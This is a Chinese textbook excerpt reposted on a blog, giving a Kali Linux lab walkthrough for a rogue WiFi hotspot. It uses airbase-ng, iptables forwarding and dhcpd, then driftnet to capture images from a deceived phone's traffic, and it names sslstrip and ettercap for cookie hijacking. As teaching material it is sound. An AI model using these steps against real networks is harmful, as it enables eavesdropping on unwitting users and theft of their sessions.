zoukankan      html  css  js  c++  java
  • 信息安全技术实用教程第4版张同光ISBN97871214230317.5实例——KaliLinux中创建WiFi热点

    信息安全技术实用教程-第4版---张同光---ISBN-9787121423031---7.5实例——KaliLinux中创建WiFi热点

    https://www.cnblogs.com/ztguang/p/12828764.html

    主  编:     张同光

    ISBN号: 978-7-121-42303-1             9787121423031
    出版日期:   2021-11-20
    出版社:     电子工业出版社

    页码:  定价:¥69.80元


    7.5  实例——Kali Linux中创建WiFi热点

    这里再介绍一种方法,是使用airbase-ng + dhcpd 创建虚拟WiFi热点;顺便使用 sslstrip+ettercap 进行中间人攻击,嗅探使用者的上网信息和劫持cookie

    实验环境如7.12所示。

     7.12  实验环境

    1步:开启终端1建立WiFi热点

    开启终端1依次执行如下命令,具体过程如7.13所示。

    # ifconfig -a //查看无线网络接口为wlan0

    # ifconfig wlan0 down

    # iwconfig wlan0 mode monitor

    # ifconfig wlan0 up

    SIOCSIFFLAGS: Operation not possible due to RF-kill

    # rfkill list

    # rfkill unblock 0

    # ifconfig wlan0 up

    # airbase-ng -e ztg wlan0 //建立WiFi热点

    airbase-ng建立WiFi热点WiFi热点的网络流量会被定向at0虚拟网络接口上。

     7.13  建立WiFi热点

    2步:开启终端2,执行iptables命令

    开启终端2,将如下命令放到一个命令行执行,如7.14所示。

    ifconfig at0 up

    ifconfig at0 192.168.1.1 netmask 255.255.255.0

    route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

    echo 1 > /proc/sys/net/ipv4/ip_forward

    iptables -F

    iptables -X

    iptables -Z

    iptables -t nat -F

    iptables -t nat -X

    iptables -t nat -Z

    iptables -t mangle -F

    iptables -t mangle -X

    iptables -t mangle -Z

    iptables -P INPUT ACCEPT

    iptables -P OUTPUT ACCEPT

    iptables -P FORWARD ACCEPT

    iptables -t nat -P PREROUTING ACCEPT

    iptables -t nat -P OUTPUT ACCEPT

    iptables -t nat -P POSTROUTING ACCEPT

    iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE    //这条命令很关键

     

    7.14  执行iptables命令

    3步:开启终端3开启dhcpd

    执行apt-get install isc-dhcp-server命令安装dhcp软件包

    编辑dhcp配置文件/etc/dhcp/dhcpd.conf,内容如下:

    default-lease-time 600;

    max-lease-time 7200;

    authoritative;

    subnet 192.168.1.0 netmask 255.255.255.0 {

        option routers 192.168.1.1;

        option subnet-mask 255.255.255.0;

        option domain-name "ztg";

        option domain-name-servers 10.3.9.4;

        range 192.168.1.20 192.168.1.50;

    }

    开启终端3执行如下命令开启dhcpd7.15所示。

    # /etc/init.d/isc-dhcp-server stop; dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0

    4步:捕获被欺骗者手机流量

    看到7.16最后一行,说明欺骗者手机已经连接WiFi热点在手机上使用浏览器访问http://www.ebay.cn/

     7.16  欺骗者手机已经连接WiFi热点

    攻击者电脑上,开启终端4执行driftnet -i at0命令,捕获欺骗者访问http://www.ebay.cn/网站时页面中所包含的图片7.17所示。

        

    7.17  捕获的图片 7.18  保存捕获的图片

  • 相关阅读:
    自动生成 serialVersionUID 的设置
    常见的HTTP状态码(HTTP Status Code)说明
    PowerDesigner 创建表格及导出SQL语句
    简历
    idea+Maven+SSM框架增删改查
    @Resource和@Autowired的区别
    SSM java.lang.NullPointerException
    多进程和多线程的优缺点(二)
    多进程和多线程的优缺点
    基于swoole扩展实现真正的PHP数据库连接池
  • 原文地址:https://www.cnblogs.com/ztguang/p/15611978.html
Copyright © 2011-2022 走看看